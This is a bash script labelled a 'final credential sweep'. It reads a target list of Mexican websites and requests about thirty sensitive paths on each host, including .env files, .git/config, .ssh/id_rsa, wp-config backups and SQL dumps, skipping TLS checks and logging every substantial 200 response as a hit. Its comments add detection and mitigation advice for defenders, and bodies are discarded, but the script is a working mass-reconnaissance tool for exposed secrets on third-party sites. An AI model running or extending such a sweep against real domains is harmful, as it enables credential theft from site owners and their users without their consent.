#!/bin/bash
# Final credential sweep - checks exposed file paths across Mexico domains
#
# For every host listed in $DOMAINS, requests each entry of $PATHS over HTTPS
# and writes one "HIT|host|/path|code|sizeB" line to $OUT when the response is
# a 200 larger than 50 bytes. Response bodies are discarded (-o /dev/null);
# only the status code and byte count are kept.
#
# Reading this from the serving side:
#   - Detection: a single client requesting this fixed list of dotfiles, VCS
#     metadata, config backups and SQL dumps in the same order against one
#     host, within seconds, is the signature to alert on in access logs / WAF.
#   - Mitigation: deny dotfiles and VCS directories at the web server, keep
#     backups, dumps and logs outside the document root, remove phpinfo pages,
#     and rotate any secret that was ever reachable at one of these paths.

# Input list; its contents are not shown here. Presumably one hostname per
# line with no scheme, since each line is spliced into "https://$domain/..."
# below. TODO confirm.
DOMAINS="/opt/huntr/targets/mexico-websites.txt"
OUT="/opt/sweep-results.txt"
# Create or truncate the results file, so every run discards the previous results.
> "$OUT"

# Space-separated list of relative paths. The for loop below expands it
# unquoted on purpose so that word splitting yields one path per iteration.
PATHS=".git/config .env .env.local .env.production .env.backup wp-config.php wp-config.php.bak wp-config.php.old configuration.php config.php .htaccess phpinfo.php info.php .bash_history .bashrc .ssh/id_rsa .svn/entries .DS_Store web.config backup.sql dump.sql database.sql db.sql config/database.php config/database.yml app/config/parameters.yml wp-content/debug.log error_log vendor/composer/installed.json composer.json package.json .npmrc .env.example"

# IFS= and -r keep each line exactly as written (no trimming, no backslash
# processing).
while IFS= read -r domain; do
  # Skip blank lines and lines that start with '#'.
  [[ -z "$domain" || "$domain" =~ ^# ]] && continue
  for path in $PATHS; do
    # -s silent, -k skip TLS certificate verification, -L follow redirects,
    # --max-time 8 caps each request at 8 seconds; curl's stderr is dropped.
    # -w prints "<status>|<bytes downloaded>" for the final response, i.e. the
    # one reached after any redirects rather than the originally requested URL.
    result=$(curl -skL -o /dev/null -w "%{http_code}|%{size_download}" --max-time 8 "https://$domain/$path" 2>/dev/null)
    code=$(echo "$result" | cut -d'|' -f1)
    size=$(echo "$result" | cut -d'|' -f2)
    # A "hit" is only status 200 with more than 50 bytes. The body is never
    # inspected, so a hit line is a lead to verify, not confirmed exposure.
    if [ "$code" = "200" ] && [ "$size" -gt 50 ]; then
      # tee -a prints the hit to stdout and appends it to the results file.
      echo "HIT|$domain|/$path|$code|${size}B" | tee -a "$OUT"
    fi
  done
done < "$DOMAINS"
# Only hit lines are written to $OUT, so its line count equals the number of hits.
echo "=== SWEEP COMPLETE: $(wc -l < "$OUT") hits ==="
